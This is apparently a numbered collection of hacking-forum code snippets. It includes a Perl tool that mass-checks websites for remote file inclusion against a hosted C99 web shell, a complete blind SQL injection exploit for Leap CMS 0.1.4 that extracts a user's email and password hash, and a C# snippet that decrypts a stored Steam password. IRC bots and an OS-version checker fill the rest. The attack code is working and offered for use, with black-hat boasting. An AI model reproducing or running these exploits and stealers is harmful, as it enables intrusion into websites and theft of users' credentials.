        if line1.find("!sha512 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :sha-512: '+ hashlib.sha512(line1.split('!sha512 ')[1]).hexdigest() + '\r\n')
            print 'function !sha512'
        if line1.find("!hash ")>0:
            print 'function !hash'
            go=line1.split('!hash ')[1]
            if len(go)==32:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MD5/MSCash/MD2/MD4/Haval128/NTLM/RipeMD128\r\n')
            if go.find('==') != -1:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(Base64)\r\n')
            if go.find('$1$$') != -1:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(Unix)\r\n')
            if go.find('$apr1$$') != -1:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MD5(APR)\r\n')
            if len(go)==16:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MySQL\r\n')
            if len(go)==40:
                irc.send ('PRIVMSG ' + chan + ' :hash type: MySQL5/SHA-1\r\n')
            if len(go)==13:
                irc.send ('PRIVMSG ' + chan + ' :hash type: DES(Unix)\r\n')
            if len(go)==28:
                irc.send ('PRIVMSG ' + chan + ' :hash type: SHA-1(Base64)\r\n')
            if len(go)==8:
                irc.send ('PRIVMSG ' + chan + ' :hash type: ADLER32/CRC-32\r\n')
            if len(go)<=5:
                irc.send ('PRIVMSG ' + chan + ' :error!\r\n')
  21. This tool was designed to better learn Perl and to test a very large RFI list.

Usage: perl perl_verf.pl
[!] RFI File: rfi.txt
[!] Shell Path: http://www.root-the.net/shell.txt??
[!] Shell String: C99Shell
[!] Output File: good_rfis.txt
[~] Verifying...
[+] www.site.com/rfi.php=http://www.root-the.net/shell.txt??

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;

print q(
+++++++++++++++++++++
+ PERL RFI VERIFIER +
+ BY R3V3RS3 +
+++++++++++++++++++++
);

$good = 0;
$total = 0;
print "[!] RFI File: ";
chop ($rfi = <STDIN>);
print "[!] Shell Path: ";
chop ($shell = <STDIN>);
print "[!] Shell String: ";
chop ($shellstring = <STDIN>);
print "[!] Output File: ";
chop ($outfile = <STDIN>);
print "[~] Verifying...\n\n";

open("rfi") or die("Could not open log file.");
foreach $line (<rfi>) {
    chomp($line);
    my $site = $line.$shell;
    my $w = HTTP::Request->new(GET=>$site);
    my $ua = LWP::UserAgent->new();
    my $an = $ua->request($w);
    $total += 1;
    if($an->content =~ $shellstring) {
        open(DAT,">>$outfile") || die("Cannot Open File");
        print DAT "$site\n";
        close(DAT);
        print "[+] $site\n";
        $good += 1;
    }else{}
}
open(DAT,">>$outfile") || die("Cannot Open File");
print DAT ">> DONE SCANNING <<";
close(DAT);
print "\n[~] Verifying Complete.\n";
print "[~] Stats: $good / $total\n";
  22. #!/usr/bin/perl
# rembawz.pl - IRC OPBot
# [7ru31337 - if j00 us3 th1z u'z a 7ru3 bl4c|< h4t h4><0rZZ]
# by RingZero
# www.rem0te.org

$nick = 'RemB4WZ';         # Nickname that will be shown
$ircd = 'irc.azzurra.org'; # IRC server
$chan = '#rembawz';        # IRC channel
$pass = 'pwdzdelbotasd';   # Bot password (for the commands)
$upwd = '';                # NickServ password

use IO::Socket;

$sock = new IO::Socket::INET (
    PeerAddr => $ircd,
    PeerPort => 6667,
    Proto => 'tcp'
) || "Impossibile connettersi a $ircd\n";

banner();

print $sock "NICK $nick\r\n";
print $sock "USER roflcopter 8 * :rem0te.org\r\n";
#print $sock "PRIVMSG NickServ :IDENTIFY $nick $upwd\r\n";
print $sock "JOIN $chan\r\n";

while($recv = <$sock>) {
    if ($recv =~ /PRIVMSG $nick :!op (.*?) $pass/) {
        print $sock "MODE $chan +o $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!deop (.*?) $pass/) {
        print $sock "MODE $chan -o $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!hop (.*?) $pass/) {
        print $sock "MODE $chan +h $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!dehop (.*?) $pass/){
        print $sock "MODE $chan -h $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!v (.*?) $pass/) {
        print $sock "MODE $chan +v $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!dev (.*?) $pass/) {
        print $sock "MODE $chan -v $1\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!kick (.*?) $pass/) {
        print $sock "KICK $chan $1 GTFO\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!kill $pass/) {
        print $sock "PRIVMSG $chan :Addio stronzi di $chan\r\n";
        print $sock "QUIT\r\n";
    }
    if ($recv =~ /PRIVMSG $nick :!ren (.*?) $pass/) {
        print $sock "NICK $1\r\n";
    }
    if ($recv =~ /:(.*?)!(.*?) JOIN :$chan/) {
        print $sock "PRIVMSG $chan :$1, benvenuto su $chan\r\n";
    }
    if ($recv =~ /PING .*?)/) {
        print $sock "PONG :$1\r\n";
    }
}

sub banner() {
print q {
 __ _____ .----.-----.--------.| |--.| | |.--.--.--.-----.
| _| -__| || _ ||__ | | | |-- __|
|__| |_____|__|__|__||_____| |__||________|_____|
};
}
  23. #!/usr/bin/perl
#-----------------------------------------------
#BLIND SQL INJECTION--Leap CMS 0.1.4-->
#-----------------------------------------------
#
# CMS INFORMATION:
#
#-->WEB: http://leap.gowondesigns.com/
#-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap
#-->CATEGORY: CMS / Lite
#-->DESCRIPTION: Leap is a single file, template independent, open-source,
#   standards-compliant,extensible content management system for the web...
#-->RELEASED: 2009-03-13
#
# CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3 and I-Explorer 6
#-->DORK: "Powered by Leap"
#-->CATEGORY: BLIND SQL INJECTION EXPLOIT
#-->AFFECT VERSION: 0.1.4 (maybe <= ?)
#-->Discovered Bug date: 2009-04-24
#-->Reported Bug date: 2009-04-24
#-->Fixed bug date: Not fixed
#-->Info patch: Not fixed
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
#-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)
#
#-----------
#BUG FILE:
#-----------
#
#Path --> [HOME_PATH]/leap.php
#
#
#
#function contentSearch() {
#
#   ...
#
#   if($searchterm=='') return FALSE;
#
#   ...
#
#   if (eregi(" AND | NOT | OR ",$search,$matches)) $search=str_replace($matches,'',$search); <-------BYPASSED (/**/)
#
#   $keywords = explode(' ', $search); //print_r($keywords); <---------BYPASSED (/**/)
#
#   ...
#
#   $query = "SELECT * FROM ".db('prefix')."content WHERE published='1' AND"; <----------START QUERY
#
#   if ($keyCount > 1) {
#
#       ...
#
#   }
#   else {
#
#       $query .=" (INSTR(`title`, '$keywords[0]') > '0' || INSTR(`body`, '$keywords[0]') > '0' || ...)";} <--------INJECTION HERE
#   $pquery=$query.';';
#   $query.=" ORDER BY mod_date DESC LIMIT $pg, $max;"; //echo $query;
#
#   ...
#
#   }
#
#}
#
#------------
#CONDITIONS:
#------------
#
#**gpc_magic_quotes=off
#
#---------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
#---------------------------------------
#
#SEARCH --> a')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/1=1#
#
#Return: Search for 'a'
#
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
#

use LWP::UserAgent;
use HTTP::Request;

#Subroutines

sub lw {
    my $SO = $^O;
    my $linux = "";
    if (index(lc($SO),"win")!=-1){
        $linux="0";
    }else{
        $linux="1";
    }
    if($linux){
        system("clear");
    }
    else{
        system("cls");
        system ("title Leap CMS 0.1.4 (BLIND SQL Injection) Exploit");
        system ("color 04");
    }
}

sub request {
    my $userag = LWP::UserAgent->new;
    $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $request = HTTP::Request -> new(POST => $_[0]);
    $request->content_type('application/x-www-form-urlencoded');
    $request->content($_[1]);
    my $outcode= $userag->request($request)->as_string;
    return $outcode;
}

sub helper {
    print "\n\t[<-->] Leap CMS 0.1.4 - (BLIND SQL Injection) Exploit\n";
    print "\t[<-->] USAGE MODE: [<-->]\n";
    print "\t[<-->] perl $0 [HOST] [PATH] [Search] [Id]\n";
    print "\t[<-->] [HOST]: Web.\n";
    print "\t[<-->] [PATH]: Home Path.\n";
    print "\t[<-->] [Search]: Something. Default: a (**optional)\n";
    print "\t[<-->] [id]: Id user. Default: 1 (**optional)\n";
    print "\t[<-->] Example: perl $0 'www.example.es' 'leap-CMS' 'a' '1'\n";
}

sub lengthuser{
    #First, user length...
    $exit=0;
    $i=0;
    while($exit==0){
        my $searchinjected="searchterm=".$_[2]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/length(mail)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id=".$_[1].")=".$i++."#"; #injected code
        $output=&request($_[0],$searchinjected);
        if ( $output =~ (/No Results Found./)) {
            $exit=0;
        }else{
            $exit=1;
        }
    }
    #Save column length
    $lengthuser=$i-1;
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tUser Length catched!\n";
    print "\tUser Length: ".$lengthuser."\n";
    print "\tBruteforcing values...\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    return $lengthuser;
}

sub bruteforcing {
    my $values="";
    #Getting datas
    $j=1;
    $i=46;
    while(($j<=$_[2]) && ($i<=126)){
        my $searchinjected="searchterm=".$_[4]."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/ascii(substring((SELECT/*y3nh4ck3r*/".$_[3]."/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id='".$_[1]."'),".$j.",1))=".$i."#"; #injected code
        $output=&request($_[0],$searchinjected);
        if ( $output !~ (/No Results Found./)) {
            $values=$values.chr($i);
            $j++;
            $i=45;
        }
        if($i==57) {
            $i=63; #@
        }
        if($i==64) {
            $i=96;
        }
        #new char
        $i++;
    }
    #Error
    if(($i>127) || ($j>$_[2])){
        if(!$values){
            print "\t<<<<<--------------------------------------------------------->>>>>\n";
            print "\tEXPLOIT FAILED!\n";
            print "\tFatal error: Datas doesn't find!\n";
            print "\tCause: Maybe you have to include more characters on bruteforcing...\n";
            print "\t<<<<<--------------------------------------------------------->>>>>\n";
            exit(1);
        }
    }
    return $values;
}

#Main

&lw;

print "\t\t#######################################################\n\n";
print "\t\t#######################################################\n\n";
print "\t\t## Leap CMS 0.1.4 - (BLIND SQL Injection) Exploit ##\n\n";
print "\t\t## ++Conditions: Need magic_quotes=off ##\n\n";
print "\t\t## Author: Y3nh4ck3r ##\n\n";
print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t\t## Proud to be Spanish! ##\n\n";
print "\t\t#######################################################\n\n";
print "\t\t#######################################################\n\n";

#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];

#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?search";

#Check all variables needed
$numArgs = $#ARGV + 1;
if($numArgs<=1) {
    &helper;
    exit(1);
}

#Search parameter. It's optional. Default:a
if(!$ARGV[2]){
    $search="a";
}else{
    $search=$ARGV[2];
}

#Id-user is optional.Default:1
if(!$ARGV[3]){
    $idhacked="1";
}else{
    $idhacked=$ARGV[3];
}

#Testing blind sql injection
my $finalrequest = $finalhost;

#Test blind sql injection
my $searchinjected="searchterm=".$search."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/1=1#"; #injected code
$output=&request($finalrequest, $searchinjected);
if ( $output =~ (/No Results Found./)) {
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tThis Web is not vulnerable!\n";
    print "\t--->Maybe:\n";
    print "\t1.-Patched or gpc_magic_quotes=off\n";
    print "\t2.-Search parameter hasn't found. Try other!\n";
    print "\tEXPLOIT FAILED!\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    exit(1);
}else{
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tWeb is vulnerable!\n";
    print "\tTested Blind SQL Injection.\n";
    print "\tChecking id user...\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
}

#Test if user exists
my $searchinjected="searchterm=".$search."')>'1')/*y3nh4ck3r*/AND/*y3nh4ck3r*/(SELECT/*y3nh4ck3r*/COUNT(*)/*y3nh4ck3r*/FROM/*y3nh4ck3r*/users/*y3nh4ck3r*/WHERE/*y3nh4ck3r*/id='".$idhacked."')#"; #injected code
$output=&request($$finalrequest,$searchinjected);
if ( $output =~ (/No Results Found./)) {
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tUser doesn't exists!\n";
    print "\tEXPLOIT FAILED!\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    exit(1);
}else{
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tOK...The user exists!\n";
    print "\tStarting exploit...\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tWait several minutes...\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
}

#Bruteforcing user...
$length_mail=&lengthuser($finalrequest,$idhacked,$search);
$email=&bruteforcing($finalrequest,$idhacked,$length_mail,'mail',$search);
if(length($email)!=$length_mail) {
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    print "\tEXPLOIT FAILED!\n";
    print "\tFatal error: Different length email!\n";
    print "\tCause: Maybe you have to include more characters on bruteforcing...\n";
    print "\t<<<<<--------------------------------------------------------->>>>>\n";
    exit(1);
}
print "\t<<<<<--------------------------------------------------------->>>>>\n";
print "\tGot user!\n";
print "\tBruteforcing password hash (md5)...\n";
print "\t<<<<<--------------------------------------------------------->>>>>\n";

#Bruteforcing password...
$passhash=&bruteforcing($finalrequest,$idhacked,32,'pwd',$search); #it isn't needed length

print "\n\t\t*************************************************\n";
print "\t\t**** EXPLOIT EXECUTED (LeapCMS 0.1.4 BSQLi) ****\n";
print "\t\t*************************************************\n\n";
print "\t\tUser-id:".$idhacked."\n";
print "\t\tE-mail:".$email."\n";
print "\t\tUser-password(hash):".$passhash."\n\n";
print "\n\t\t<<----------------------FINISH!-------------------->>\n\n";
print "\t\t<<---------------Thanks to: y3hn4ck3r-------------->>\n\n";
print "\t\t<<------------------------EOF---------------------->>\n\n";
exit(1);
#
  24. // steam decrypt //
      // snippet by t0fx & lolita //
      // give credits //
      using System;
      using System.IO;
      using System.Runtime.InteropServices;
      using System.Text;
      using Microsoft.Win32;

      namespace steam_decrypt
      {
        class Program
        {
          [DllImport("Steam.dll", CallingConvention = CallingConvention.Cdecl)]
          public static extern int SteamDecryptDataForThisMachine(string encryptedData, int encryptedDataSize, StringBuilder decryptedBuffer, int decryptedBufferSize, ref int decryptedDataSize);

          static void Main(string[] args)
          {
            try
            {
              RegistryKey rksteam = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Valve\\Steam", true);
              if (rksteam != null)
              {
                string steaMpath = (string)rksteam.GetValue("SteamPath");
                if (File.Exists(Environment.CurrentDirectory + "\\Steam.dll") == false)
                {
                  File.Copy(steaMpath + "\\Steam.dll", Environment.CurrentDirectory + "\\Steam.dll", true);
                }
                string[] data = File.ReadAllLines(steaMpath + "\\config\\SteamAppData.vdf");
                for (int pos = 0; pos < data.Length; pos++)
                {
                  if (data[pos].Contains("User"))
                  {
                    string[] info = System.Text.RegularExpressions.Regex.Replace(data[pos], @"\s+", " ").Split(' ');
                    if (info[2] != null)
                    {
                      string username = info[2].TrimEnd('"').TrimStart('"');
                      Console.WriteLine("Username : " + username);
                    }
                  }
                }
                string sInhalt = File.ReadAllText(steaMpath + "\\ClientRegistry.blob");
                int Phrase;
                Phrase = sInhalt.IndexOf("Phrase", 1);
                sInhalt = Mid(sInhalt, Phrase + 40);
                string encpwd = Left(sInhalt, 92).Trim();
                int decryptedDataSize = 0;
                StringBuilder pwd = new StringBuilder();
                pwd.Length = encpwd.Length / 2;
                if (SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, ref decryptedDataSize) == 0)
                {
                  Console.WriteLine("Password : " + pwd);
                }
                else
                {
                  Console.WriteLine("error : Error decrypting the Steam Password.");
                }
              }
              Console.ReadLine();
            }
            catch (Exception g)
            {
              try
              {
                const string steaMpath = ("@C:\\Program Files\\Steam");
                File.Copy(steaMpath + "\\Steam.dll", Environment.CurrentDirectory + "\\Steam.dll", true);
                string[] data = File.ReadAllLines(steaMpath + "\\config\\SteamAppData.vdf");
                for (int pos = 0; pos < data.Length; pos++)
                {
                  if (data[pos].Contains("User"))
                  {
                    string[] info = System.Text.RegularExpressions.Regex.Replace(data[pos], @"\s+", " ").Split(' ');
                    if (info[2] != null)
                    {
                      string username = info[2].TrimEnd('"').TrimStart('"');
                      Console.WriteLine("Username : " + username);
                    }
                  }
                }
                string sInhalt = File.ReadAllText(steaMpath + "\\ClientRegistry.blob");
                int Phrase;
                Phrase = sInhalt.IndexOf("Phrase", 1);
                sInhalt = Mid(sInhalt, Phrase + 40);
                string encpwd = Left(sInhalt, 92).Trim();
                int decryptedDataSize = 0;
                StringBuilder pwd = new StringBuilder();
                pwd.Length = encpwd.Length / 2;
                if (SteamDecryptDataForThisMachine(encpwd, encpwd.Length, pwd, pwd.Length, ref decryptedDataSize) == 0)
                {
                  Console.WriteLine("Password : " + pwd);
                }
                else
                {
                  Console.WriteLine("Error decrypting the Steam Password.");
                }
                Console.ReadLine();
              }
              catch (Exception h)
              {
                Console.WriteLine("Steam not installed or password not stored");
              }
            }
          }

          public static string Left(string param, int length)
          {
            string result = param.Substring(0, length);
            return result;
          }

          public static string Mid(string param, int startIndex)
          {
            string result = param.Substring(startIndex);
            return result;
          }
        }
      }
  25. // snippet by t0fx //
      // give credits if u use it //
      using System;

      namespace GetOS
      {
        class Program
        {
          static void Main(string[] args)
          {
            // Environment.OSVersion gives e.g. "Microsoft Windows NT 5.1.2600 Service Pack 3";
            // each branch swaps the version prefix for a product name.
            OperatingSystem osInfo = Environment.OSVersion;
            string os = osInfo.ToString();
            try
            {
              if (os.StartsWith("Microsoft Windows NT 6.0.6000.0"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 6.0.6000.0", "Vista Enterprise"));
              }
              if (os.StartsWith("Microsoft Windows NT 5.1.2600"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.1.2600", "Windows XP"));
              }
              if (os.StartsWith("Microsoft Windows 4.10.1998"))
              {
                // original replaced the XP prefix here, so the Windows 98 line was printed unchanged
                Console.WriteLine(os.Replace("Microsoft Windows 4.10.1998", "Windows 98"));
              }
              if (os.StartsWith("Microsoft Windows 4.10.2222"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows 4.10.2222", "Windows 98 SE"));
              }
              if (os.StartsWith("Microsoft Windows NT 5.0.2195"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.0.2195", "Windows 2000"));
              }
              if (os.StartsWith("Microsoft Windows 4.90.3000"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows 4.90.3000", "Windows Me"));
              }
              // Note: the three checks below share the same build prefix, so all three lines
              // are printed on a 5.2.3790 system; the build number alone does not distinguish them.
              if (os.StartsWith("Microsoft Windows NT 5.2.3790"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.2.3790", "Windows XP 64-bit Edition 2003"));
              }
              if (os.StartsWith("Microsoft Windows NT 5.2.3790"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.2.3790", "Windows Server 2003"));
              }
              if (os.StartsWith("Microsoft Windows NT 5.2.3790"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.2.3790", "Windows XP Professional x64 Edition"));
              }
              if (os.StartsWith("Microsoft Windows NT 6.0.6001"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 6.0.6001", "Windows Vista"));
              }
              if (os.StartsWith("Microsoft Windows NT 5.2.4500"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 5.2.4500", "Windows Home Server"));
              }
              if (os.StartsWith("Microsoft Windows NT 6.1.7100"))
              {
                Console.WriteLine(os.Replace("Microsoft Windows NT 6.1.7100", "Windows Seven"));
              }
            }
            catch (Exception k)
            {
              // original was missing the '+' here and did not compile
              Console.WriteLine("Error : " + k);
            }
          }
        }
      }